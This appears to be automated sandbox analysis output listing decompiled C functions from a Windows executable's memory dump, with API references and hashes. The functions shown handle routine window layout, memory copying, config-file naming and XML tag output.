                                                                                                  • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                  • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                  • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                  				intOrPtr _v12;
                                                                                                  				struct tagPOINT _v20;
                                                                                                  				struct tagRECT _v36;
                                                                                                  				int _t27;
                                                                                                  				struct HWND__* _t30;
                                                                                                  				struct HWND__* _t32;
                                                                                                  
                                                                                                  				_t30 = _a4;
                                                                                                  				if((_a8 & 0x00000001) != 0) {
                                                                                                  					_t32 = GetParent(_t30);
                                                                                                  					GetWindowRect(_t30,  &_v20);
                                                                                                  					GetClientRect(_t32,  &_v36);
                                                                                                  					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                  					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                  					_v20.x = _t27;
                                                                                                  					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                  				}
                                                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                                                  					E00404FBB(_t30);
                                                                                                  				}
                                                                                                  				return 1;
                                                                                                  			}









                                                                                                  0x00405d03
                                                                                                  0x00405d06
                                                                                                  0x00405d10
                                                                                                  0x00405d17
                                                                                                  0x00405d22
                                                                                                  0x00405d32
                                                                                                  0x00405d40
                                                                                                  0x00405d48
                                                                                                  0x00405d4e
                                                                                                  0x00405d54
                                                                                                  0x00405d59
                                                                                                  0x00405d5c
                                                                                                  0x00405d61
                                                                                                  0x00405d67

                                                                                                  APIs
                                                                                                  • GetParent.USER32(?), ref: 00405D0A
                                                                                                  • GetWindowRect.USER32 ref: 00405D17
                                                                                                  • GetClientRect.USER32 ref: 00405D22
                                                                                                  • MapWindowPoints.USER32 ref: 00405D32
                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                  • String ID:
                                                                                                  • API String ID: 4247780290-0
                                                                                                  • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                  • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                  • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                  • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 89%
                                                                                                  			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* _v16;
                                                                                                  				void* _t20;
                                                                                                  				void* _t21;
                                                                                                  				signed int _t28;
                                                                                                  				void* _t32;
                                                                                                  				void* _t34;
                                                                                                  
                                                                                                  				_t20 = __eax;
                                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                                  				_push(__ebx);
                                                                                                  				_t28 = __eax - 1;
                                                                                                  				L0040B26C();
                                                                                                  				_v16 = __eax;
                                                                                                  				if(_t28 > 0) {
                                                                                                  					_t21 = _a4;
                                                                                                  					_v8 = __ebx;
                                                                                                  					_v8 =  ~_v8;
                                                                                                  					_t32 = _t28 * __ebx + _t21;
                                                                                                  					_a4 = _t21;
                                                                                                  					do {
                                                                                                  						memcpy(_v16, _a4, __ebx);
                                                                                                  						memcpy(_a4, _t32, __ebx);
                                                                                                  						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                  						_a4 = _a4 + __ebx;
                                                                                                  						_t32 = _t32 + _v8;
                                                                                                  						_t34 = _t34 + 0x24;
                                                                                                  						_v12 = _v12 + 1;
                                                                                                  						_t28 = _t28 - 1;
                                                                                                  					} while (_t28 > _v12);
                                                                                                  				}
                                                                                                  				_push(_v16);
                                                                                                  				L0040B272();
                                                                                                  				return _t20;
                                                                                                  			}











                                                                                                  0x004083dc
                                                                                                  0x004083e2
                                                                                                  0x004083e9
                                                                                                  0x004083ea
                                                                                                  0x004083eb
                                                                                                  0x004083f3
                                                                                                  0x004083f6
                                                                                                  0x004083f8
                                                                                                  0x00408401
                                                                                                  0x00408404
                                                                                                  0x00408407
                                                                                                  0x00408409
                                                                                                  0x0040840c
                                                                                                  0x00408413
                                                                                                  0x0040841d
                                                                                                  0x00408427
                                                                                                  0x0040842c
                                                                                                  0x0040842f
                                                                                                  0x00408432
                                                                                                  0x00408435
                                                                                                  0x00408438
                                                                                                  0x00408439
                                                                                                  0x0040843e
                                                                                                  0x0040843f
                                                                                                  0x00408442
                                                                                                  0x0040844a

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$??2@??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1252195045-0
                                                                                                  • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                  • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                  • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                  • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 76%
                                                                                                  			E00406746(void* __esi) {
                                                                                                  				intOrPtr _t9;
                                                                                                  				intOrPtr _t10;
                                                                                                  				intOrPtr _t11;
                                                                                                  				intOrPtr* _t18;
                                                                                                  				void* _t19;
                                                                                                  
                                                                                                  				_t19 = __esi;
                                                                                                  				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                  				if(_t9 != 0) {
                                                                                                  					_push(_t9);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                  				if(_t10 != 0) {
                                                                                                  					_push(_t10);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                  				if(_t11 != 0) {
                                                                                                  					_push(_t11);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                  				if(_t18 != 0) {
                                                                                                  					_t11 =  *_t18;
                                                                                                  					if(_t11 != 0) {
                                                                                                  						_push(_t11);
                                                                                                  						L0040B272();
                                                                                                  						 *_t18 = 0;
                                                                                                  					}
                                                                                                  					_push(_t18);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                  				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                  				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                  				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                  				return _t11;
                                                                                                  			}








                                                                                                  0x00406746
                                                                                                  0x00406746
                                                                                                  0x0040674f
                                                                                                  0x00406751
                                                                                                  0x00406752
                                                                                                  0x00406757
                                                                                                  0x00406758
                                                                                                  0x0040675d
                                                                                                  0x0040675f
                                                                                                  0x00406760
                                                                                                  0x00406765
                                                                                                  0x00406766
                                                                                                  0x0040676e
                                                                                                  0x00406770
                                                                                                  0x00406771
                                                                                                  0x00406776
                                                                                                  0x00406777
                                                                                                  0x0040677f
                                                                                                  0x00406781
                                                                                                  0x00406785
                                                                                                  0x00406787
                                                                                                  0x00406788
                                                                                                  0x0040678e
                                                                                                  0x0040678e
                                                                                                  0x00406790
                                                                                                  0x00406791
                                                                                                  0x00406796
                                                                                                  0x00406798
                                                                                                  0x0040679e
                                                                                                  0x004067a1
                                                                                                  0x004067a4
                                                                                                  0x004067ab

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                  • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                  • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                  • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 87%
                                                                                                  			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                  				struct HDWP__* _v8;
                                                                                                  				intOrPtr _v12;
                                                                                                  				void* __ebx;
                                                                                                  				intOrPtr _t37;
                                                                                                  				intOrPtr _t42;
                                                                                                  				RECT* _t44;
                                                                                                  
                                                                                                  				_push(__ecx);
                                                                                                  				_push(__ecx);
                                                                                                  				_t42 = __ecx;
                                                                                                  				_v12 = __ecx;
                                                                                                  				if(_a4 != 5) {
                                                                                                  					if(_a4 != 0xf) {
                                                                                                  						if(_a4 == 0x24) {
                                                                                                  							_t37 = _a12;
                                                                                                  							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                  							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						E00402EC8(__ecx + 0x378);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v8 = BeginDeferWindowPos(3);
                                                                                                  					_t44 = _t42 + 0x378;
                                                                                                  					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                  					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                  					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                  					EndDeferWindowPos(_v8);
                                                                                                  					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                  					_t42 = _v12;
                                                                                                  				}
                                                                                                  				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                  			}









                                                                                                  0x0040aba8
                                                                                                  0x0040aba9
                                                                                                  0x0040abb0
                                                                                                  0x0040abb2
                                                                                                  0x0040abb5
                                                                                                  0x0040ac19
                                                                                                  0x0040ac2c
                                                                                                  0x0040ac2e
                                                                                                  0x0040ac36
                                                                                                  0x0040ac39
                                                                                                  0x0040ac39
                                                                                                  0x0040ac1b
                                                                                                  0x0040ac21
                                                                                                  0x0040ac21
                                                                                                  0x0040abb7
                                                                                                  0x0040abcb
                                                                                                  0x0040abce
                                                                                                  0x0040abd7
                                                                                                  0x0040abe6
                                                                                                  0x0040abf6
                                                                                                  0x0040abfe
                                                                                                  0x0040ac09
                                                                                                  0x0040ac0f
                                                                                                  0x0040ac12
                                                                                                  0x0040ac4f

                                                                                                  APIs
                                                                                                  • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                  • String ID: $
                                                                                                  • API String ID: 2498372239-3993045852
                                                                                                  • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                  • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                  • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                  • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                  				int _t14;
                                                                                                  
                                                                                                  				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                  					GetKeyState(0xa2);
                                                                                                  					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                  						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                  							_t14 = E00403A60(0xa5);
                                                                                                  							if(_t14 == 0) {
                                                                                                  								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                  							}
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                  			}




                                                                                                  0x00403a7d
                                                                                                  0x00403a8c
                                                                                                  0x00403a9c
                                                                                                  0x00403aba
                                                                                                  0x00403adf
                                                                                                  0x00403ae7
                                                                                                  0x00403af4
                                                                                                  0x00403af4
                                                                                                  0x00403ae7
                                                                                                  0x00403aba
                                                                                                  0x00403a9c
                                                                                                  0x00403b13

                                                                                                  APIs
                                                                                                  • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                    • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                  • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: State$CallMessageProcSendWindow
                                                                                                  • String ID: A
                                                                                                  • API String ID: 3924021322-3554254475
                                                                                                  • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                  • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                  • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                  • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 91%
                                                                                                  			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                  				intOrPtr _v20;
                                                                                                  				char _v1072;
                                                                                                  				void _v3672;
                                                                                                  				char _v4496;
                                                                                                  				intOrPtr _v4556;
                                                                                                  				char _v4560;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr* _t41;
                                                                                                  				void* _t45;
                                                                                                  
                                                                                                  				_t45 = __eflags;
                                                                                                  				E0040B550(0x11cc, __ecx);
                                                                                                  				E00402923( &_v4560);
                                                                                                  				_v4560 = 0x40db44;
                                                                                                  				E00406670( &_v4496, _t45);
                                                                                                  				_v4496 = 0x40dab0;
                                                                                                  				memset( &_v3672, 0, 0x10);
                                                                                                  				E0040A909( &_v1072);
                                                                                                  				_t41 = _a4;
                                                                                                  				_v4556 = 0x71;
                                                                                                  				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                  					L0040B266();
                                                                                                  					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                  				}
                                                                                                  				_v4496 = 0x40dab0;
                                                                                                  				_v4560 = 0x40db44;
                                                                                                  				E004067AC( &_v4496);
                                                                                                  				return E00402940( &_v4560);
                                                                                                  			}













                                                                                                  0x004034f0
                                                                                                  0x004034f8
                                                                                                  0x00403506
                                                                                                  0x00403516
                                                                                                  0x0040351c
                                                                                                  0x00403531
                                                                                                  0x00403537
                                                                                                  0x00403545
                                                                                                  0x0040354a
                                                                                                  0x00403556
                                                                                                  0x00403567
                                                                                                  0x00403575
                                                                                                  0x00403583
                                                                                                  0x00403583
                                                                                                  0x00403586
                                                                                                  0x00403592
                                                                                                  0x00403598
                                                                                                  0x004035ac

                                                                                                  APIs
                                                                                                    • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                    • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                  • memset.MSVCRT ref: 00403537
                                                                                                  • _ultow.MSVCRT ref: 00403575
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$memset$_ultow
                                                                                                  • String ID: cf@$q
                                                                                                  • API String ID: 3448780718-2693627795
                                                                                                  • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                  • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                  • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                  • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E00402F31(void* _a4) {
                                                                                                  				void _v530;
                                                                                                  				long _v532;
                                                                                                  				void* __edi;
                                                                                                  				wchar_t* _t15;
                                                                                                  				intOrPtr _t18;
                                                                                                  				short* _t19;
                                                                                                  				void* _t29;
                                                                                                  
                                                                                                  				_v532 = _v532 & 0x00000000;
                                                                                                  				memset( &_v530, 0, 0x208);
                                                                                                  				E00404AD9( &_v532);
                                                                                                  				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                  				if(_t15 != 0) {
                                                                                                  					 *_t15 =  *_t15 & 0x00000000;
                                                                                                  				}
                                                                                                  				wcscat( &_v532, L".cfg");
                                                                                                  				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                  				_t19 = _t18 + 0x5504;
                                                                                                  				_t36 =  *_t19;
                                                                                                  				_pop(_t29);
                                                                                                  				if( *_t19 != 0) {
                                                                                                  					E00404923(0x104,  &_v532, _t19);
                                                                                                  					_pop(_t29);
                                                                                                  				}
                                                                                                  				return E00402FC6(_t29, _t36,  &_v532);
                                                                                                  			}










                                                                                                  0x00402f3a
                                                                                                  0x00402f51
                                                                                                  0x00402f60
                                                                                                  0x00402f6f
                                                                                                  0x00402f78
                                                                                                  0x00402f7a
                                                                                                  0x00402f7a
                                                                                                  0x00402f8a
                                                                                                  0x00402f8f
                                                                                                  0x00402f94
                                                                                                  0x00402f99
                                                                                                  0x00402f9e
                                                                                                  0x00402f9f
                                                                                                  0x00402fad
                                                                                                  0x00402fb2
                                                                                                  0x00402fb2
                                                                                                  0x00402fc5

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00402F51
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                  • wcscat.MSVCRT ref: 00402F8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                  • String ID: .cfg
                                                                                                  • API String ID: 776488737-3410578098
                                                                                                  • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                  • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                  • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                  • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                  				void _v514;
                                                                                                  				signed short _v516;
                                                                                                  				void _v1026;
                                                                                                  				signed short _v1028;
                                                                                                  				void* __esi;
                                                                                                  				void* _t17;
                                                                                                  				intOrPtr* _t26;
                                                                                                  				signed short* _t28;
                                                                                                  
                                                                                                  				_v516 = _v516 & 0x00000000;
                                                                                                  				_t26 = __ecx;
                                                                                                  				memset( &_v514, 0, 0x1fc);
                                                                                                  				_v1028 = _v1028 & 0x00000000;
                                                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                                                  				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                  				_t28 =  &_v516;
                                                                                                  				E00407250(_t28, _t17);
                                                                                                  				_push(_t28);
                                                                                                  				_push(L"</%s>\r\n");
                                                                                                  				_push(0xff);
                                                                                                  				_push( &_v1028);
                                                                                                  				L0040B1EC();
                                                                                                  				return E00407343(_t26, _a4,  &_v1028);
                                                                                                  			}











                                                                                                  0x00407e2d
                                                                                                  0x00407e46
                                                                                                  0x00407e48
                                                                                                  0x00407e4d
                                                                                                  0x00407e5f
                                                                                                  0x00407e6b
                                                                                                  0x00407e6f
                                                                                                  0x00407e75
                                                                                                  0x00407e7c
                                                                                                  0x00407e7d
                                                                                                  0x00407e88
                                                                                                  0x00407e8d
                                                                                                  0x00407e8e
                                                                                                  0x00407eaa

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00407E48
                                                                                                  • memset.MSVCRT ref: 00407E5F
                                                                                                    • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                    • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                  • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                  • String ID: </%s>
                                                                                                  • API String ID: 3400436232-259020660
                                                                                                  • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                  • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                  • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                  • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 77%
                                                                                                  			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                  				void _v8198;
                                                                                                  				short _v8200;
                                                                                                  				void* _t9;
                                                                                                  				void* _t12;
                                                                                                  				intOrPtr _t19;
                                                                                                  				intOrPtr _t20;
                                                                                                  
                                                                                                  				_t19 = __ecx;
                                                                                                  				_t9 = E0040B550(0x2004, __ecx);
                                                                                                  				_t20 = _t19;
                                                                                                  				if(_t20 == 0) {
                                                                                                  					_t20 =  *0x40fe24; // 0x0
                                                                                                  				}
                                                                                                  				_t25 =  *0x40fb90;
                                                                                                  				if( *0x40fb90 != 0) {
                                                                                                  					_v8200 = _v8200 & 0x00000000;
                                                                                                  					memset( &_v8198, 0, 0x2000);
                                                                                                  					_push(_t20);
                                                                                                  					_t12 = 5;
                                                                                                  					E00405E8D(_t12);
                                                                                                  					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                  						SetWindowTextW(_a4,  &_v8200);
                                                                                                  					}
                                                                                                  					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                  				}
                                                                                                  				return _t9;
                                                                                                  			}









                                                                                                  0x00405e0a
                                                                                                  0x00405e12
                                                                                                  0x00405e18
                                                                                                  0x00405e1c
                                                                                                  0x00405e1e
                                                                                                  0x00405e1e
                                                                                                  0x00405e24
                                                                                                  0x00405e2c
                                                                                                  0x00405e2e
                                                                                                  0x00405e44
                                                                                                  0x00405e49
                                                                                                  0x00405e4c
                                                                                                  0x00405e4d
                                                                                                  0x00405e68
                                                                                                  0x00405e74
                                                                                                  0x00405e74
                                                                                                  0x00000000
                                                                                                  0x00405e84
                                                                                                  0x00405e8c

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
